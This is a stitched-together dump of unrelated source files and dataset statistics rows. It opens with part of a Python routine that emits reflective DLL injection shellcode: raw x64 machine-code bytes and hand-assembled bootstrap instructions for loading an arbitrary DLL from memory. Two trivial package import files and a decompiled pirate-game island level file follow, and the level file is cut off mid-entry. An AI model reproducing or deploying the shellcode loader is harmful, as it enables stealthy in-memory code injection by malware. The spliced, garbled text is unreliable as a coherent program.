\x8B\x6C\x24\x30\x4C\x03\xF0\x48\xFF\xCD\x41\x83\x7E\xEC\x00\x0F\x86\x9D\x00\x00\x00\x45\x8B\x06\x41\x8B\xD0\xC1\xEA\x1E\x41\x8B\xC0\x41\x8B\xC8\xC1\xE8\x1D\x83\xE2\x01\xC1\xE9\x1F\x83\xE0\x01\x75\x1E\x85\xD2\x75\x0B\xF7\xD9\x1B\xDB\x83\xE3\x07\xFF\xC3\xEB\x3E\xF7\xD9\xB8\x02\x00\x00\x00\x1B\xDB\x23\xD8\x03\xD8\xEB\x2F\x85\xD2\x75\x18\x85\xC9\x75\x05\x8D\x5A\x10\xEB\x22\x85\xD2\x75\x0B\x85\xC9\x74\x1A\xBB\x80\x00\x00\x00\xEB\x13\x85\xC9\x75\x05\x8D\x59\x20\xEB\x0A\x85\xC9\xB8\x40\x00\x00\x00\x0F\x45\xD8\x41\x8B\x4E\xE8\x4C\x8D\x8C\x24\xC0\x00\x00\x00\x41\x8B\x56\xEC\x8B\xC3\x0F\xBA\xE8\x09\x41\x81\xE0\x00\x00\x00\x04\x0F\x44\xC3\x48\x03\xCE\x44\x8B\xC0\x8B\
xD8\x41\xFF\xD5\x85\xC0\x0F\x84\xA1\xFC\xFF\xFF\x49\x83\xC6\x28\x48\x85\xED\x0F\x85\x48\xFF\xFF\xFF\x44\x8D\x6D\x02\x8B\x5F\x28\x45\x33\xC0\x33\xD2\x48\x83\xC9\xFF\x48\x03\xDE\x41\xFF\xD4\xBD\x01\x00\x00\x00\x48\x8B\xCE\x44\x8B\xC5\x8B\xD5\xFF\xD3\x45\x85\xFF\x0F\x84\x97\x00\x00\x00\x83\xBF\x8C\x00\x00\x00\x00\x0F\x84\x8A\x00\x00\x00\x8B\x97\x88\x00\x00\x00\x48\x03\xD6\x44\x8B\x5A\x18\x45\x85\xDB\x74\x78\x83\x7A\x14\x00\x74\x72\x44\x8B\x52\x20\x33\xDB\x44\x8B\x4A\x24\x4C\x03\xD6\x4C\x03\xCE\x45\x85\xDB\x74\x5D\x45\x8B\x02\x4C\x03\xC6\x33\xC9\x41\x0F\xBE\x00\x4C\x03\xC5\xC1\xC9\x0D\x03\xC8\x41\x80\x78\xFF\x00\x75\xED\x44\x3B\xF9\x74\x10\x03\xDD\x49\x83\xC2\x04\x4D\x03\xCD\x41\x3B\xDB\x72\xD2\xEB\x2D\x41\x0F\xB7\x01\x83\xF8\xFF\x74\x24\x8B\x52\x1C\x48\x8B\x8C\x24\xD0\x00\x00\x00\xC1\xE0\x02\x48\x98\x48\x03\xC6\x44\x8B\x04\x02\x8B\x94\x24\xD8\x00\x00\x00\x4C\x03\xC6\x41\xFF\xD0\x48\x8B\xC6\x48\x83\xC4\x78\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5F\x5E\x5D\x5B\xC3\xCC\xCC\xCC\x48\x89\x5C\x24\x08\x48\x89\x74\x24\x10\x57\x48\x83\xEC\x10\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x8B\xF1\x48\x8B\x50\x18\x4C\x8B\x4A\x10\x4D\x8B\x41\x30\x4D\x85\xC0\x0F\x84\xB4\x00\x00\x00\x41\x0F\x10\x41\x58\x49\x63\x40\x3C\x33\xD2\x4D\x8B\x09\xF3\x0F\x7F\x04\x24\x42\x8B\x9C\x00\x88\x00\x00\x00\x85\xDB\x74\xD4\x48\x8B\x04\x24\x48\xC1\xE8\x10\x44\x0F\xB7\xD0\x45\x85\xD2\x74\x21\x48\x8B\x4C\x24\x08\x45\x8B\xDA\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xEB\x01\x75\xE7\x4D\x8D\x14\x18\x33\xC9\x41\x8B\x7A\x20\x49\x03\xF8\x41\x39\x4A\x18\x76\x8F\x8B\x1F\x45\x33\xDB\x49\x03\xD8\x48\x8D\x7F\x04\x0F\xBE\x03\x48\xFF\xC3\x41\xC1\xCB\x0D\x44\x03\xD8\x80\x7B\xFF\x00\x75\xED\x41\x8D\x04\x13\x3B\xC6\x74\x0D\xFF\xC1\x41\x3B\x4A\x18\x72\xD1\xE9\x5B\xFF\xFF\xFF\x41\x8B\x42\x24\x03\xC9\x49\x03\xC0\x0F\xB7\x14\x01\x41\x8B\x4A\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B\x74\x24\x28\x48\x83\xC4\x10\x5F\xC3"
if is64BitDLL(dllBytes):
rdiShellcode = rdiShellcode64
bootstrap = b''
bootstrapSize = 64
# call next instruction (Pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
# pop rcx - Capture our current location in memory
bootstrap += b'\x59'
# mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
bootstrap += b'\x49\x89\xc8'
# add rcx, <Offset of the DLL>
bootstrap += b'\x48\x81\xc1'
bootstrap += pack('I', dllOffset)
# mov edx, <Hash of function>
bootstrap += b'\xba'
bootstrap += pack('I', functionHash)
# Setup the location of our user data
# add r8, <Offset of the DLL> + <Length of DLL>
bootstrap += b'\x49\x81\xc0'
userDataLocation = dllOffset + len(dllBytes)
bootstrap += pack('I', userDataLocation)
# mov r9d, <Length of User Data>
bootstrap += b'\x41\xb9'
bootstrap += pack('I', len(userData))
# push rsi - save original value
bootstrap += b'\x56'
# mov rsi, rsp - store our current stack pointer for later
bootstrap += b'\x48\x89\xe6'
# and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
bootstrap += b'\x48\x83\xe4\xf0'
# sub rsp, 0x30 - Create some breathing room on the stack
bootstrap += b'\x48\x83\xec'
bootstrap += b'\x30' # 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
# mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
bootstrap += b'\xC7\x44\x24'
bootstrap += b'\x20'
bootstrap += pack('I', flags)
# call - Transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# mov rsp, rsi - Reset our original stack pointer
bootstrap += b'\x48\x89\xf4'
# pop rsi - Put things back where we left them
bootstrap += b'\x5e'
# ret - return to caller
bootstrap += b'\xc3'
# Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
return bootstrap + rdiShellcode + dllBytes + userData
else: # 32 bit
rdiShellcode = rdiShellcode32
bootstrap = b''
bootstrapSize = 45
# call next instruction (Pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
# pop ecx - Capture our current location in memory
bootstrap += b'\x58'
# mov ebx, eax - copy our location in memory to ebx before we start modifying eax
bootstrap += b'\x89\xc3'
# add eax, <Offset to the DLL>
bootstrap += b'\x05'
bootstrap += pack('I', dllOffset)
# add ebx, <Offset to the DLL> + <Size of DLL>
bootstrap += b'\x81\xc3'
userDataLocation = dllOffset + len(dllBytes)
bootstrap += pack('I', userDataLocation)
# push <Flags>
bootstrap += b'\x68'
bootstrap += pack('I', flags)
# push <Length of User Data>
bootstrap += b'\x68'
bootstrap += pack('I', len(userData))
# push ebx
bootstrap += b'\x53'
# push <hash of function>
bootstrap += b'\x68'
bootstrap += pack('I', functionHash)
# push eax
bootstrap += b'\x50'
# call - Transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# add esp, 0x14 - correct the stack pointer
bootstrap += b'\x83\xc4\x14'
# ret - return to caller
bootstrap += b'\xc3'
# Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
return bootstrap + rdiShellcode + dllBytes + userData
return False
| 86.474227 | 5,964 | 0.693014 | 3,458 | 16,776 | 3.358878 | 0.112782 | 0.062505 | 0.037968 | 0.009298 | 0.284718 | 0.227637 | 0.173052 | 0.158588 | 0.112957 | 0.108308 | 0 | 0.287552 | 0.105508 | 16,776 | 193 | 5,965 | 86.92228 | 0.486472 | 0.102825 | 0 | 0.450549 | 0 | 0.021978 | 0.762781 | 0.741985 | 0 | 1 | 0.002 | 0 | 0 | 1 | 0.032967 | false | 0 | 0.021978 | 0 | 0.10989 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7cebb3256038e87043837fa8a27e45e35beafd59 | 28 | py | Python | abacusevents/__init__.py | kairosfuture/abacusevents | 121215a6855f2e0371e557b5f0d1dd7f2f33e069 | [
"MIT"
] | null | null | null | abacusevents/__init__.py | kairosfuture/abacusevents | 121215a6855f2e0371e557b5f0d1dd7f2f33e069 | [
"MIT"
] | null | null | null | abacusevents/__init__.py | kairosfuture/abacusevents | 121215a6855f2e0371e557b5f0d1dd7f2f33e069 | [
"MIT"
] | null | null | null | from .abacusevents import *
| 14 | 27 | 0.785714 | 3 | 28 | 7.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6b354e9ad9a8d149f740fe1097ce51acf65e7231 | 34 | py | Python | crslab/data/dataset/redial/__init__.py | hcmus-nlp-chatbot/CRSLab | b3ab262a4ad93cbae98fe66541eb735377768a35 | [
"MIT"
] | 315 | 2021-01-05T06:31:57.000Z | 2022-03-16T21:12:23.000Z | crslab/data/dataset/redial/__init__.py | hcmus-nlp-chatbot/CRSLab | b3ab262a4ad93cbae98fe66541eb735377768a35 | [
"MIT"
] | 23 | 2021-01-09T05:43:26.000Z | 2022-03-28T21:05:49.000Z | crslab/data/dataset/redial/__init__.py | hcmus-nlp-chatbot/CRSLab | b3ab262a4ad93cbae98fe66541eb735377768a35 | [
"MIT"
] | 71 | 2021-01-05T06:31:59.000Z | 2022-03-06T06:30:35.000Z | from .redial import ReDialDataset
| 17 | 33 | 0.852941 | 4 | 34 | 7.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.966667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86144d2c0d782a09f0e9c6fc4e95d5bcf1398c63 | 33,405 | py | Python | pirates/leveleditor/worldData/AnvilIsland.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 3 | 2021-02-25T06:38:13.000Z | 2022-03-22T07:00:15.000Z | pirates/leveleditor/worldData/AnvilIsland.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | null | null | null | pirates/leveleditor/worldData/AnvilIsland.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 1 | 2021-02-25T06:38:17.000Z | 2021-02-25T06:38:17.000Z | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.AnvilIsland
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Interact Links': [['1179265920.0dxschafe3', '1179266176.0dxschafe0', 'Bi-directional'], ['1179266048.0dxschafe1', '1179265920.0dxschafe4', 'Bi-directional'], ['1179265920.0dxschafe5', '1179266048.0dxschafe0', 'Bi-directional'], ['1179266176.0dxschafe', '1179265920.0dxschafe', 'Bi-directional'], ['1179266048.0dxschafe3', '1179266048.0dxschafe2', 'Bi-directional']], 'Locator Links': [['1172208953.19sdnaik', '1172172361.37kmuller', 'Bi-directional'], ['1172208953.17sdnaik', '1172209006.14sdnaik', 'Bi-directional']], 'Objects': {'1164135492.81dzlu': {'Type': 'Island', 'Name': "Devil's Anvil", 'File': '', 'AdditionalData': ['WildIslandC'], 'Environment': 'OpenSky', 'Minimap': False, 'Objects': {'1164766305.45sdnaik': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(383.541, 187.297, 25.49), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Model': 'models/misc/smiley'}}, '1168745928.39WDIG': {'Type': 'Port Collision Sphere', 'Name': 'DevilsAnvilPort', 'Hpr': VBase3(0.0, 0.0, 0.0), 'Pos': Point3(141.014, -36.03, 0.0), 'Scale': VBase3(1435.579, 1435.579, 1435.579), 'VisSize': '', 'Visual': {'Color': (0.5, 0.5, 1.0, 0.2), 'Model': 'models/misc/smiley'}}, '1172172361.37kmuller': {'Type': 'Locator Node', 'Name': 'portal_exterior_1', 'Hpr': VBase3(62.291, 0.0, 0.0), 'Pos': Point3(138.788, 208.05, 26.94), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1172208953.16sdnaik': {'Type': 'Connector Tunnel', 'File': '', 'Hpr': VBase3(149.405, 0.0, 0.0), 'Objects': {'1172208953.17sdnaik': {'Type': 'Locator Node', 'Name': 'portal_connector_1', 'GridPos': Point3(359.595, 418.268, 14.54), 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(95.197, 150.0, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1172208953.19sdnaik': {'Type': 'Locator Node', 'Name': 'portal_connector_2', 'GridPos': Point3(264.398, 271.529, 14.54), 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(8.658, 3.262, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0)}}, 'Pos': Point3(264.398, 
268.268, 796.747), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/tunnels/pir_m_are_tun_cave'}}, '1172209006.11sdnaik': {'Type': 'Island Game Area', 'File': 'anvil_island_area_barbossa_cave', 'Hpr': VBase3(44.069, 0.0, 0.0), 'Objects': {'1172209006.14sdnaik': {'Type': 'Locator Node', 'Name': 'portal_interior_1', 'GridPos': Point3(-189.152, -270.01, 621.081), 'Hpr': VBase3(95.675, 0.0, 0.0), 'Pos': Point3(85.919, -190.083, 24.757), 'Scale': VBase3(1.0, 1.0, 1.0)}}, 'Pos': Point3(-1041.043, -125.656, 784.758), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/caves/pir_m_are_cav_barbossa'}}, '1179265792.0dxschafe0': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(92.182, 322.044, 14.274), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Model': 'models/misc/smiley'}}, '1179265792.0dxschafe1': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(484.566, -152.122, 24.766), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Model': 'models/misc/smiley'}}, '1179265792.0dxschafe2': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(274.556, -338.71, 19.625), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Model': 'models/misc/smiley'}}, '1179265792.0dxschafe3': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': -1, 'Pos': Point3(-39.93, -416.502, 17.591), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'VisSize': '', 'Visual': {'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(599.676, -99.293, 14.865), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Ambush', 'StartFrame': '0', 'Team': 
'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe0': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(525.573, -246.82, 19.678), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe1': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(475.158, 185.339, 17.029), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe2': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(103.481, -443.445, 14.221), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe3': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': 
'1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-70.548, -470.441, 10.584), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Ambush', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe4': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-191.895, -361.723, 10.601), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T3', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179265920.0dxschafe5': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(255.868, -260.416, 26.309), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Ambush', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179266048.0dxschafe': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(146.583, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-2.71, -313.549, 25.759), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 
'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179266048.0dxschafe0': {'Type': 'Object Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(198.651, -280.033, 26.229), 'Priority': '1', 'Scale': VBase3(1.0, 1.0, 1.0), 'SpawnDelay': '20', 'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179266048.0dxschafe1': {'Type': 'Object Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-120.407, -308.577, 22.002), 'Priority': '1', 'Scale': VBase3(1.0, 1.0, 1.0), 'SpawnDelay': '20', 'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179266048.0dxschafe2': {'Type': 'Object Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-51.641, 316.748, 13.308), 'Priority': '1', 'Scale': VBase3(1.0, 1.0, 1.0), 'SpawnDelay': '20', 'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179266048.0dxschafe3': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-34.752, 372.583, 6.103), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T3', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1179266176.0dxschafe': {'Type': 'Object Spawn Node', 'Hpr': VBase3(0.0, 0.0, 8.13), 'Pos': Point3(594.806, -37.041, 13.963), 'Priority': '1', 'Scale': VBase3(0.926, 0.926, 0.926), 'SpawnDelay': '20', 
'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179266176.0dxschafe0': {'Type': 'Object Spawn Node', 'Hpr': VBase3(0.0, 4.0, 0.0), 'Pos': Point3(-112.953, -473.594, 8.516), 'Priority': '1', 'Scale': VBase3(1.0, 1.0, 1.0), 'SpawnDelay': '20', 'Spawnables': 'Buried Treasure', 'VisSize': '', 'Visual': {'Color': (0.8, 0.2, 0.65, 1), 'Model': 'models/misc/smiley'}, 'startingDepth': '12'}, '1179288192.0JB0': {'Type': 'Player Boot Node', 'AreaUid': '1172208953.16sdnaik', 'Hpr': VBase3(-26.706, 0.0, 0.0), 'Pos': Point3(156.168, 233.226, 24.553), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.5, 1.0, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1184890880.0dxschafe0': {'Type': 'Locator Node', 'Name': 'portal_exterior_2', 'Hpr': VBase3(-88.249, 0.0, 0.0), 'Pos': Point3(111.24, -257.791, 26.94), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1184890880.0dxschafe1': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(-61.301, -3.389, 0.0), 'Location': 'Water', 'Pos': Point3(439.778, 290.738, 0.913), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1184891008.0dxschafe': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(3.889, -6.361, 3.088), 'Location': 'Water', 'Pos': Point3(176.081, 347.603, 4.377), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1184891008.0dxschafe0': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': 1, 'Pos': Point3(153.026, 334.063, 7.954), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1184891008.0dxschafe1': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': 1, 'Pos': Point3(323.216, 284.901, 8.216), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, 
'1184891136.0dxschafe': {'Type': 'Player Spawn Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Index': 1, 'Pos': Point3(514.201, 137.198, 13.158), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1189100537.84kmuller': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(50.735, 0.0, 0.0), 'Location': 'Land', 'Pos': Point3(649.482, -78.732, 0.09), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1189100602.12kmuller': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(68.908, 0.0, 0.0), 'Location': 'Land', 'Pos': Point3(457.149, -385.579, -0.171), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1189100641.06kmuller': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(-35.56, 0.0, 0.0), 'Location': 'Water', 'Pos': Point3(-11.463, -540.969, 0.135), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1189100678.54kmuller': {'Type': 'Dinghy', 'Aggro Radius': '20.0000', 'Hpr': VBase3(-33.496, 0.0, 0.0), 'Location': 'Land', 'Pos': Point3(-245.855, -324.606, 0.684), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/shipparts/dingy-geometry_High'}}, '1189100725.93kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(74.707, 0.0, 0.0), 'Pos': Point3(-230.516, -311.041, 3.68), 'Scale': VBase3(0.32, 1.0, 3.524), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1189100753.31kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(-55.758, 0.0, 0.0), 'Pos': Point3(-254.586, -316.186, -8.463), 'Scale': VBase3(1.12, 1.665, 6.122), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1189101604.12kmuller': {'Type': 'Player Spawn Node', 'Hpr': VBase3(-79.286, 0.0, 0.0), 'Index': 1, 'Pos': Point3(496.556, -119.78, 24.341), 'Scale': VBase3(1.0, 1.0, 1.0), 
